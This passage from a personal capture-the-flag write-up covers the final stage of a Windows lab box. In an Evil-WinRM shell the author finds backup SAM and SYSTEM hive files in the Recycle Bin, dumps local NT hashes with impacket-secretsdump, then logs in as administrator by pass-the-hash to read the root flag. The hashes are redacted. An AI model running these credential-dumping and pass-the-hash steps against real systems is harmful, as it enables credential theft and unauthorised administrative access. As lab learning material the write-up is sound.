 ..
 ..

At which point it crashed ........

SAD

Ok, lets look around the file system as it could be the AV breaking winPEAS...

*Evil-WinRM* PS C:\> gci -hidden .


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        9/18/2020   2:14 AM                $Recycle.Bin
d--hsl        9/17/2020   7:27 PM                Documents and Settings
d--h--        9/18/2020   2:04 AM                ProgramData
d--hs-        9/17/2020   7:27 PM                Recovery
d--hs-        9/17/2020   7:26 PM                System Volume Information
-a-hs-        2/14/2021  11:40 PM     1207959552 pagefile.sys

We have the Recycle Bin, let's take a look in there...

*Evil-WinRM* PS C:\> gci -path 'C:\$Recycle.Bin' -h


    Directory: C:\$Recycle.Bin


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        9/18/2020   7:28 PM                S-1-5-21-1987495829-1628902820-919763334-1001
d--hs-       11/13/2020  10:41 PM                S-1-5-21-1987495829-1628902820-919763334-500

Ok, two directories in there ..... as with Linux there are some reserved / well known SID's / RID's and normally '....-500' would indicate a local administrator account so let skip that and have a look in ...-1001 which should be a user.

*Evil-WinRM* PS C:\> cd 'C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001'
*Evil-WinRM* PS C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001> gci


    Directory: C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/18/2020   7:28 PM          49152 sam.bak
-a----        9/18/2020   7:28 PM       17457152 system.bak

Ooooo we have a sam.bak and system.bak ....... these normally allow you to grab the LM or NT hashes.... Can we download them ?

Even though the download looks like it works from the $Recyclue.Bin it does not, you need to copy them somewhere else first

> download sam.bak
Info: Downloading C:\users\[REDACTED]\sam.bak to sam.bak

Progress: 6% : |▒░░░░░░░░░░|

Info: Download successful!

> download system.bak
Info: Downloading C:\users\[REDACTED]\system.bak to system.bak

Progress: 12% : |▒░░░░░░░░░|   

Info: Download successful!

Ok, so using impacket-secretsdump we can smash these file together and get the hash....

╰─⠠⠵ impacket-secretsdump -ts local -system system.bak -sam sam.bak
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[2021-02-15 00:48:43] [*] Target system bootKey: 0xd676472afd9cc13ac271e26890b87a8c
[2021-02-15 00:48:43] [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:[REDACTED]:[REDACTED]:::
Guest:501:[REDACTED]:[REDACTED]:[REDACTED]:::
DefaultAccount:503:[REDACTED]:[REDACTED]:::
WDAGUtilityAccount:504:[REDACTED]:[REDACTED]:::
[REDACTED]:1001:[REDACTED]:[REDACTED]:::
[2021-02-15 00:48:43] [*] Cleaning up... 

Using the nthash we can the access the server

╰─⠠⠵ evil-winrm -i owl -u administrator -H [REDACTED]

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
year-of-the-owl\administrator

We can then use gc to get the root flag..

*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ..\Desktop\*txt
[REDACTED]

Finish

That was frustrating with the UDP / SNMP ....... also took me a while to get back around to doing this box.

Finish

Twitter

Anyway, that is the series completed ( for now...., Year of the Ox ? )

Series